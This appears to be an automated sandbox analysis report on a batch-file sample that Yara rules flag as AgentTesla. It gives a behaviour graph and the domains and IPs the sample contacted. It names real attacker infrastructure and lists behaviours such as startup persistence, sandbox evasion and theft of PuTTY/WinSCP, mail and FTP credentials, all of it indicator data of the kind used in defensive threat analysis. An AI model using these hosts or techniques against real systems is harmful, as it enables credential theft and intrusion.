Source: Yara match File source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7684, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545586 Sample: ilZhNx3JAc.bat Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 48 nffplp.com 2->48 50 ip-api.com 2->50 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Yara detected AgentTesla 2->60 62 13 other signatures 2->62 9 cmd.exe 1 2->9         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 72 Uses cmd line tools excessively to alter registry or file data 9->72 14 ilZhNx3JAc.bat.Dmf 17 9->14         started        18 xcopy.exe 2 9->18         started        20 conhost.exe 9->20         started        24 3 other processes 9->24 74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->74 22 cmd.exe 1 12->22         started        process6 file7 44 C:\Users\user\AppData\...\MustFlush.vbs, ASCII 14->44 dropped 90 Drops VBS files to the startup folder 14->90 92 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->92 94 Writes to foreign memory regions 14->94 98 4 other signatures 14->98 26 InstallUtil.exe 15 2 14->26         started        46 C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, PE32 18->46 dropped 96 Uses cmd line tools excessively to alter registry or file data 22->96 30 MustFlush.bat.Dmf 15 22->30         started        32 xcopy.exe 2 22->32         started        35 conhost.exe 22->35         started        37 3 other processes 22->37 signatures8 process9 dnsIp10 52 ip-api.com 208.95.112.1, 49724, 49802, 80 TUT-ASUS United States 26->52 54 nffplp.com 163.44.198.71, 49740, 49815, 587 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG Singapore 26->54 76 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 26->76 78 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->78 80 Tries to steal Mail credentials (via file / registry access) 26->80 82 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 26->82 84 Powershell is started from unusual location (likely to bypass HIPS) 30->84 86 Reads the Security eventlog 30->86 88 Reads the System eventlog 30->88 39 InstallUtil.exe 30->39         started        42 C:\Users\user\AppData\...\MustFlush.bat.Dmf, PE32 32->42 dropped file11 signatures12 process13 signatures14 64 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 39->64 66 Tries to steal Mail credentials (via file / registry access) 39->66 68 Tries to harvest and steal ftp login credentials 39->68 70 2 other signatures 39->70
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS true
163.44.198.71
 nffplp.com Singapore
135161 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG true

Contacted Domains

Name IP Active
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true
ip-api.com 208.95.112.1 true
nffplp.com 163.44.198.71 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ip-api.com/line/?fields=hosting false
  • URL Reputation: safe
 unknown